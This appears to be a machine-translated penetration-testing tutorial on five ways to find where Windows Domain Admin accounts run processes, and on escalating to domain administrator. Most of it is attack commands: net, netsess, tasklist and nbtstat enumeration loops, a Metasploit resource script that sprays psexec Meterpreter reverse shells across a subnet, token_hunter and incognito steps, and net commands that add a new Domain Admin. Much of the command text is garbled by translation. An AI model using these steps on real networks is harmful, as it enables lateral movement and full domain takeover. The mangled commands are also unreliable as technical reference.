Objective
When a computer is joined to a domain, the "domain Admin" Group is granted the permissions of the local system administrator by default. That is, in the process of adding a computer to a domain and becoming a member host of a domain, the Domain Admin field group is automatically added to the local Administrators group. As a result, members of the Domain Admin group can access the local computer and have Full Control permissions.
So for penetration testers, adding the Domain Admin field group to the local Administrators group is a common way for them to emulate the operation of the domain administrator account. But the premise is that they need to know the system that these processes are running. In this article, there are five ways to find the process that "Domain Admin" runs, and the techniques involved include:
1. Local inspection;
2. Querying domain controllers for active domain user sessions;
3. Scan the remote system running the task;
4. Remote system for scanning NetBIOS protocol information
5. PsExec Shell spraying remote system for token verification
Get Domain Administration permissions
In most cases, this article will focus on the system that is running the domain management process. But even so, I'd like to introduce a number of standard procedures that penetration testers use to get domain administrator privileges.
1. Identify target systems and applications;
2. Identification of potential vulnerabilities;
3. Exploit the vulnerability to obtain initial access rights;
4. Upgrade the permissions of the infected system;
5. Locate the domain management process or authentication token on the local or remote system;
6. Authenticate the remote system running the domain management process by sending the local administrator's password hash, cracking the password, or using a tool such as Mimikatz to dump the password;
7. Go to the domain management process;
8. Create a domain management;
The above process is a common step for penetration testing, so there is no need to introduce more. If you are interested in the details, there are a lot of textbooks on the Internet.
Find domain Management processes
Here are 5 techniques I've looked up on the web to find the domain management process.
Technology 1: Local inspection
Be sure to first check the system that was initially compromised, and if you already exist in the domain management process, it really doesn't make sense to run on the network. Here's a simple way to check if any domain management processes are running by using native commands:
1. Run the following command to get the list of Domain Admins: NET group "domain Admins"/domain;
2. Run the tasklist/v command to list the process and process users, and the account that runs the process should be in column 7th;
3. Cross-reference the task list to the Domain Admins list to see if you are in the domain management process;
It would be great if the domain management process was always running on the system that was initially attacked, but this is an ideal situation. So the next four technologies will help you find domain management processes on remote domain systems in a variety of situations.
Tip 2: Querying active domain user sessions for domain controllers
As far as I know, this technology is the original technology of security company NETSPI. We need a domain management process and login to identify the activity instead of executing shell spraying across the network or performing any scan that would trigger an intrusion detection system. Finally, I found that simply querying to get a list of active domain user sessions, and then cross-referencing the list with the domain management list. The only thing that can happen is that you have to query all the domain controllers. Here are some basic steps I have provided to get a list of systems for active domain management sessions with domain user rights.
1. Use LDAP queries or NET commands to collect a list of domain controllers from the Domain Controllers OU, the following is a net command I used:
NET group "Domain Controllers"/domain
Note: Although OUs are the best source for a list of domain controllers, you will want to complete the process of enumerating and monitoring these domain controllers for trusted domains. Alternatively, you can find them through DNS: Nslookup–type=srv _ldap._tcp.
2. Use the LDAP query or the net command to collect a list of domain administrators from the Domain Admins group. Here's a net command I've used:
NET group "Domain Admins"/domain
3. Collect a list of all active domain sessions by querying each domain controller using Netsess.exe. The Netsess tool is a great tool provided by Joe Richards, which contains the local Windows function "Netsessionenum". This function can return the IP address, domain account, session start time, and idle time of the active session. Here's a net command I've used:
Netsess.exe–h
4. Cross-reference the Domain Admin list to the active session list to determine which IP addresses have active domain tokens. In a more secure environment, you may need to wait for a domain administrator or service account with domain Administrator privileges to perform this operation on the network. But that means I need to run the process many times, or write it out. Here is a very fast and aggressive Windows command-line script that uses netsess.
For/f%i in (dcs.txt) do @echo [+] querying DC%i && @netsess-H%i 2>nul > Sessions.txt && for/f %a in (admins.txt) do @type sessions.txt | @findstr/I%a
Note, however, that Dcs.txt has a list of domain controllers, and admins.txt has a field admins list.
To do this, I wrote a basic batch script called Get Domain Admins (GDA), which automatically downloads the entire process. The Readme file lists the dependencies, and I also created a batch file called Get domain Users (GDU) for Windows dictionary attacks with options similar to get domain Admins (GDA). However, there are more dependencies. If you are interested, click on the link above to download.
Technology 3: Scan the remote system for running tasks
In general, the first two methods are sufficient to guarantee my success. However, there are mountains outside, and this third technique, as I saw on LaNMSteR53 's blog, I think is a clever way. When you run as a shared local administrator account on a domain system, you can scan system domain management tasks with the following scripts. Similar to the above techniques, you need to enumerate domain Admins first. In the following script, Ips.txt contains a list of target systems, and Names.txt contains a list of domain administrators.
For/f%i in (ips.txt) do @echo [+]%i && @tasklist/V/S%i/u user/p password 2>nul > output.txt &&am P for/f%n in (names.txt) do @type output.txt | findstr%n > NUL && echo [!]%n is found running a process on%i && pause
Technology 4: Remote system for scanning NetBIOS information
Some Windows systems still allow users to query through NetBIOS queries for logged-in users, you can use the native Nbtstat tool to query for information, and in nbtstat results, the user name is represented by "<03>".
1. Here is another quick and aggressive Windows command-line script that will scan the remote system to find the active Domain Admins session. Note: The script can run as a non-domain user.
For/f%i in (ips.txt) do @echo [+] Checking%i && nbtstat-a%i 2>nul >nbsessions.txt && for/f%n In (admins.txt) do @type nbsessions.txt | findstr/i%n > NUL && echo [!]%n was found logged into%i
2. You can also use a slightly faster Nbtscan tool, and here is another basic Script command:
For/f%i in (ips.txt) do @echo [+] Checking%i && nbtscan-f%i 2>nul >nbsessions.txt && for/f%n i N (admins.txt) do @type nbsessions.txt | findstr/i%n > NUL && echo [!]%n was found logged into%i
Technology 5: PsExec shell Spraying technology for authentication token remote Systems
Psexec "Shell Spray" is to install the shell (usually Meterpreter) on hundreds of systems of the Psexec module in Metasploit, thereby using shared local management credentials. Many testers use this method to identify domain management tokens along with other Metasploit features. Although this is my least favorite technology, I think I need to include it because a lot of people in the Pentest community are actively using it. However, starting 500 shells at the same time in a running environment can cause problems with the customer's system running. To be exact, having 500 shells means you can get the data faster. Here are the steps I've seen many people use:
1. Install Metasploit 3.5 and later;
2. Copy the following script into a text file and save it to the Metasploit directory as a psexec_spray.rc, which is the script I found on my Jabra blog originally.
#Setup Multi Handler to accept multiple incoming connections use Multi/handler SETG PAYLOAD WINDOWS/METERPRETER/REVERSE_TC P SETG lhost 0.0.0.0 SETG lport 55555 set exitonsession false Exploit-j-Z
Set the Smbpass #Setup凭证使用windows/smb/psexec.
#Setup域作为本地主机, you can set Smbdomain only by using domain credentials. In the PsExec module of the #disable payload handler (using a multi-handler), set Disablepayloadhandler true #Run the Rex API properties used by the Ruby code to scan the desired network range:
Range Walker #note: could also accept IP addresses from a file by replacing rhosts = ' 192.168.74.0/24 ' with rhosts = FILE.R Eadlines ("C:systems.txt") require ' Rex/socket/range_walk
3. Update the smbuser and Smbpass parameters;
4. Issue the Msfconsole–r psexec_spray.rc command to run the script. The psexec_spray.rc script will attempt to install the Meterpreter shell arbitrarily on each system's 192.168.1.0/24 network using the credentials provided.
5. You can then use the Token_hunter in the Metasploit module to identify each shell
The domain management token on the system. The steps are as follows:
5.1 Create a file that contains a list of Domain Admins, as follows: Companyjoe-admin companybill-admin companydavid-admin
5.2 Load the Token_hunter module in the msfconsole msf> load token_hunter;
5.3 Run the Token Capture tool to list the sessions that contain the domain management token msf> token_hunt_user-f/tmp/domain-admin.txt
6. Alternatively, you can use the Sessions–s Loggedin
command to get a list of currently logged-in users from each system with a shell and manually find domain Admins.
Add a new domain administrator
If you have already acquired a Meterpreter session, you can use Incognito mode to impersonate a domain administrator, or to add a new domain administrator. Incognito mode attempts to add a new domain administrator at will by traversing all available authorization tokens in the system. The following is the basic command to perform this operation in Meterpreter.
1. Use the load Incongnito command to load Incognito mode in your active Meterpreter session;
2. Try to add a domain administrator with an authentication token on the system using the following command:
Add_user-h add_group "" Domain Admins ""-H
If you are interested in creating a new domain Administrator with other options, you can use the following instructions:
1. In the Meterpreter console, enter the PS command to view the process;
2. In the Meterpreter console, locate the domain management session and migrate through the migrate command;
3. In the Meterpreter console, enter the shell command to get the OS shell;
4. Enter the following native Windows command to add a new domain administrator:
NET user/add/domainnet Group "Domain Admins"/add/domain
Summarize
As described in this article, there are a number of options that can be used to identify domain management processes and authentication tokens. I suggest using a method that has a lower impact on the system, believing that people will come up with better ideas over time.
Five ways to find the process that "Domain Admin" is running